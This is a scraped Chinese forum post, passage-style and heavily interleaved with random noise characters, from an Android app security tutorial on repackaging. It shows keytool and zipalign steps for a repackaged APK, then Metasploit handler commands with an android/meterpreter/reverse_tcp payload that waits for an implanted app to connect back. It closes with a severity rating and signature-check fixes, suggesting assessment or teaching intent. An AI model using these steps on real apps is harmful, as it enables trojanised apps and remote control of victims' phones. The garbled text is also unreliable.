) S9 C) p; |" A8 m8 ], w" J. w/ y: n N0 p0 V9 Z( c: k keytool -printcert -jarfile repackaged.apk / P6 M! ]% V1 K & {8 R% D3 t; p* a' i/ r

+ ]3 B+ t {* r( z ; I' U$ [$ I% b, E+ O3 E/ ] E) n 对齐 % J9 n, \+ F! s- @- J/ B! k7 }& A6 A6 Q5 w5 i8 h- Z2 b

9 Z$ e7 R; d* \3 I 9 S: I8 ]6 H: n* F% h# z+ c 字节对齐优化 e- U/ ~* g; L6 }- C, A7 { 8 j" K( h8 A+ x$ p" M8 f

6 e4 ?, T$ n! i: D8 G" g/ g- y . X- S. n# L' A/ A7 t zipalign -v 4 repackaged.apk final.apk 2 y7 a' a* o) Q* s! Q% R 0 J+ j2 x* O) V" b, c+ h, @

' i1 A4 B& _$ P# {' G% K 0 H5 h1 b% _; v$ Y- z1 r/ O 检查是否对齐 * L$ E6 {, Z8 \2 L" M, A ! u# }# S0 S# ^4 W% x' M; ]& D

+ y% A) K: l; {% Q# B5 N/ T " x! `7 ?( T# A! _3 Z+ H zipalign -c -v 4 final.apk 3 J P# y) G- ?& R3 h$ Y3 B% b 1 Y/ g) a/ O; c2 j! I( y' u. N2 x

8 H! i9 O3 y) |6 }0 o, `& {. G 3 P' X$ c: g8 F: g 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 ; P4 C$ M/ |* l8 @# ]* j. m& O; u' x% ?; Y6 O# I2 u: t

* l3 u* V* C% ^. {4 ^8 p. X. H % V! Y, w9 c+ Z- s- J% _ 启动Metasploit控制台，配置参数等待上线 / P/ V6 i- f" e0 c8 a; E* s" s: X8 a6 ~ \; Z! S/ |* B, I+ U' e

$ h2 [3 b- ~) Y0 s) U1 @9 z 3 Q z7 K5 [, g1 f N4 D$ S4 t 在终端依次输入如下命令 : r3 y1 j8 {* G2 O+ E " I$ Y# j7 Z" m k/ ~

( T. @2 R8 B' C" X' l8 Z% {/ o% G7 p6 Y7 ?2 o3 Z. t! g msfconsole . T1 @1 m( \ W- G3 A 4 U1 g/ H5 |0 |! q U- t3 q

, A; c" f3 h0 U5 F7 a7 ~, _9 o ; [" t! Q9 \5 ~0 Z7 q3 f6 j use exploit/multi/handler 8 D- b8 _3 y- U: E0 b & `; ]1 o8 k. {) v1 B, G

3 Q# O% P# ?8 p; U , s: @1 d0 m! k: W. w8 I( i0 T |% A set PAYLOAD android/meterpreter/reverse_tcp " f2 |& w8 Y- Z* j. z0 i0 n1 w+ A; ]$ v0 \# V7 N6 d

- y+ t( T' C* W7 H3 @3 I - R8 o" r x+ e- a set LHOST 192.xxx.xx.xx % A s- }% ~2 r0 N$ q1 ~ # U% D4 S/ j# x: G d1 v5 [3 ~9 S

2 V% c/ r" j( m ; p' P0 i1 Y$ E- y& \* A set LPORT 4444 ; ]8 R4 w0 X, |: _. }3 e+ `/ V' ~) l

6 o! {; ?: c1 P6 l * o0 X" Z9 x9 q$ t exploit ; G5 d6 S% E; A ! R6 d! {+ g8 c

/ z2 i4 P9 j. W' M: W . Z" \1 B# v! v4 k* o+ W 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： 3 X- D( b0 h" h0 t# L) u* f # W3 C$ t6 s, d/ U& b2 G

3 M! u2 D3 `" p- o, o. W6 F- U4 U" J5 j" L& y 漏洞危害：中 , A% {5 F8 I1 j, t4 X! T. W: O- z# l, E' E! W: Z [/ M- S# @

6 A$ A! q' g+ j5 ~ x. t% u T 4 ?; U t6 b% I3 ]3 D# A ; n$ B$ e# S: V( E - X* P# V2 ~6 D- ~+ l0 p( X 严重程度 ) ~" [* `: d2 ^) Y , L5 F4 h: m: C0 y: N. L & [, F0 W1 u9 y8 I5 X! k2 `. J( p$ [/ C+ Q	6 {& q! y+ m4 H! V! P& \|1 m. A ( N" _- m* E% K8 p; C; z+ e 6 y2 B( M4 _5 l; w! U F 5 v! h# {& ~8 M* E, C 高 + D/ O8 L1 P/ L8 c1 j7 g4 e8 T* s 5 [# f3 o3 a, F4 Q2 w r3 h, D6 C, ?6 i$ ^ ! C& s- j8 p: W" m$ z	, g, s( d1 y, V 0 E% w1 R( c7 T8 `) Z7 h ) T% ~. B7 ` d7 q2 D; k, r ) h' m: U& @$ D4 a9 P ■ * R0 r- m' U6 y1 p9 \|+ ], E( W1 ?0 @% D' V! R5 a* _/ E @5 m6 [ , m5 K' y/ V) H# C" J % r6 ]9 E/ Y2 B/ Q! r6 P	; A) C9 T* \|- B. p" b- n ; _1 l1 N o( V6 G ' \|' p9 B& ^$ e8 l/ V! Q2 F9 t( W, Y- r- X% N, \|6 s 中 $ r, {. U+ f/ G5 Q) v6 P' K 6 G$ r" N x" T1 x 2 m% f4 j# \|! J& D 3 t5 M1 P) u) u2 q8 h	g/ Q& j- R) B2 T! \| # b) L) e" N5 I0 u! \: ~ 0 W" s4 t+ l4 b# `% a" o* u& g$ O! W N3 x * @7 Q# O% i' _( G4 } 7 h0 ^/ b3 M) i" Q# F % ?8 s! T: C( M9 d+ E/ Z " o. k7 W3 l5 b x+ I/ p( a& F 0 V7 I5 \|) P: {! s1 C( \|+ d 5 j& ^4 q1 n' x. {8 p: @2 F	' l" b2 V4 N! \|8 v8 E& ? ! F/ ~& A O6 K7 D Z p. c- ]. M7 i9 r5 H% u T$ h/ [! ] 低 : g- g7 O3 n7 C6 G % ?* \|, q: e8 {8 }& k, e, o $ j2 j4 t2 k9 N2 `* _3 K- \9 F4 x" N$ k) [9 p0 x! G	! q; _: B- h, m ' h* H) w5 u2 {4 I- U" H ) e1 ]4 B- o6 ^* c: {' x! ? ! T' x' p* w5 L- K8 B 3 e+ u% H) U- p: X l; t0 s' j: a+ Z( O+ \3 ?" v 5 {9 j6 q5 V9 @8 Q. `7 b8 T& K9 y/ t # ^- d N9 R; {2 {# Z+ H f9 @2 ^$ z0 _4 @1 V

# p1 A9 ?5 `& Z4 Y, e j$ t* r9 C) K& | B+ { ' I4 n0 W6 \* b5 T. N . v0 e- T j$ T- A

. N5 u4 k+ G- Y% T, ^1 H' G/ V% W0 N0 f4 w! r0 v& I 修复方法： : g) a; j4 r5 r 3 G. }3 p y1 f3 b, \

8 ^' E/ T/ M( {, R6 w( Z- P 7 O" }5 j0 F, s1 S( I( r9 q( K1 a3 w 1.在 APP 启动时应做签名校验防止二次打包。
5 F5 ^/ w+ {% d , W' L7 C2 C0 k0 P* L y$ T 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 * E( g' a. p3 l! c; M6 L- W# s6 } $ Q/ i; @# X6 u) h& B8 I w; }

9 u+ `& L) H% M# T $ \- \ C# ~0 k* K4 { $ j- Y2 m& O2 N5 t3 ~, l2 ?9 u( Y1 |. N V, E* K3 m; K

& b7 j8 G5 w4 O1 }9 ^ ( H) S: a- L- b D5 [0 E+ w
% D4 Q+ `/ R2 v. h# r0 u. {6 }3 B! i2 F- h: V

		自动登录	找回密码
密码			立即注册